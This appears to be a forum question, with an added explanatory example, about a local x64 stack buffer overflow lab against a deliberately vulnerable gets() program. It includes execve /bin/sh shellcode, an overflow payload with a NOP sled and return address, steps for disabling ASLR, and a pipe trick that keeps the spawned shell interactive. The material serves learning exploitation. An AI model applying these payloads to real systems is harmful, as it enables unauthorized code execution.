I'm trying a buffer overflow on the code below:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
int main(void)
{
char str[256];                 /* 256-byte stack buffer that will be overflowed */
printf("Please type sentence\n");
gets(str);                     /* no length check: input past 256 bytes overwrites the stack */
printf("%s\n", str);
return 0;
}
I tried a buffer overflow with the shellcode below, which is stored in an environment variable:
export shellcode=$(python -c 'print "\x90"*42+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05\x99"')
I typed the following as input:
echo $(python -c 'print "abcdefgh"+"\x90"*256+"\xf0\xee\xff\xff\xff\x7f"')
But the result is a little bit strange, and I can't understand why the result is like that:
abcdefgh?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
process 12197 is executing new program: /bin/dash
[Inferior 1 (process 12197) exited normally]
Above is the result. I called execve in the shellcode with syscall, and I hoped sh would start. Why is the result different?
I use Ubuntu 16.04, x64 architecture.
I disabled ASLR with sudo sysctl -w kernel.randomize_va_space=0.
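Added example, not part of the original question: the gdb line "process ... is executing new program: /bin/dash" means the execve in the shellcode did run (/bin/sh on Ubuntu is dash). The program below reproduces, without any overflow, what a freshly execve'd /bin/sh does when its stdin is a pipe that is already closed, which is the situation when the payload is delivered with echo $(...) | ./a.out or via gdb's run < file: the shell reads EOF and exits with status 0 immediately, so you never get an interactive prompt. It assumes only that /bin/sh exists and behaves as a POSIX shell; the helper name run_sh_with_stdin is my own.

```c
/* Added example (not the original post's code): spawn /bin/sh the way the
 * shellcode does, execve("/bin/sh", ["/bin/sh"], empty env), but with its
 * stdin connected to a pipe we control, and report its exit status.
 * Assumes /bin/sh exists (on Ubuntu it is dash). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fork a child that execve()s /bin/sh with stdin read from a pipe.
 * `input` is written into the pipe (NULL means write nothing), then the
 * write end is closed so the shell sees EOF. Returns the shell's exit
 * status, or -1 if the child did not exit normally or a syscall failed. */
int run_sh_with_stdin(const char *input)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* child: make the pipe's read end the shell's stdin */
        close(fds[1]);
        if (dup2(fds[0], STDIN_FILENO) < 0)
            _exit(126);
        close(fds[0]);
        char *argv[] = { "/bin/sh", NULL };
        char *envp[] = { NULL };        /* shellcode passes no environment either */
        execve("/bin/sh", argv, envp);
        _exit(127);                      /* only reached if execve failed */
    }

    /* parent: feed the input (if any), then close to deliver EOF */
    close(fds[0]);
    if (input != NULL) {
        size_t left = strlen(input);
        const char *p = input;
        while (left > 0) {
            ssize_t n = write(fds[1], p, left);
            if (n <= 0)
                break;
            p += n;
            left -= (size_t)n;
        }
    }
    close(fds[1]);

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Case 1: stdin already at EOF, like `echo $(payload) | ./a.out`.
     * The shell starts, reads nothing, and exits normally with 0. */
    printf("sh with empty stdin exited with status %d\n",
           run_sh_with_stdin(NULL));

    /* Case 2: commands are still available on stdin, so the shell runs
     * them; here "exit 42" shows the status is the shell's own. */
    printf("sh reading 'exit 42' exited with status %d\n",
           run_sh_with_stdin("exit 42\n"));
    return 0;
}
```

The usual way around this when delivering a payload through a pipe is to keep the shell's stdin open after the payload, for example (python -c '...'; cat) | ./a.out, so that the spawned shell keeps reading your keystrokes from cat instead of hitting EOF.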